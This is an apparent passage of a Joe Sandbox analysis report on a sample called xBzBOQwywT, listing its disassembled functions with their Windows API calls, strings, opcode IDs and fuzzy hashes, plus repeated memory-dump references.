                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                        • String ID: 0
                                                                        • API String ID: 161812096-4108050209
                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                        Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae7318f8f9e2d32f1a10471d007c6175db480ae53bc9a704c562829f3cafcd02
                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                        • Opcode Fuzzy Hash: ae7318f8f9e2d32f1a10471d007c6175db480ae53bc9a704c562829f3cafcd02
                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                        Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                        Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 978794511-0
                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                        Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                        Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                        Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_memcmp
                                                                        • String ID: '$\$h
                                                                        • API String ID: 2205784470-1303700344
                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                        Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                        Strings
                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 2441338619-1568723262
                                                                        • Opcode ID: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                        • Opcode Fuzzy Hash: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                        Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                        • String ID: @COM_EVENTOBJ
                                                                        • API String ID: 327565842-2228938565
                                                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                        Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                        • String ID: H
                                                                        • API String ID: 3613100350-2852464175
                                                                        • Opcode ID: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                        • Opcode Fuzzy Hash: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                        Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1291720006-3916222277
                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                        Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                        • String ID: 0$2
                                                                        • API String ID: 93392585-3793063076
                                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                        Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                        • String ID: crts
                                                                        • API String ID: 586820018-3724388283
                                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                        Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 2326526234-1173974218
                                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                        Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                        • _wcslen.LIBCMT ref: 004335F2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
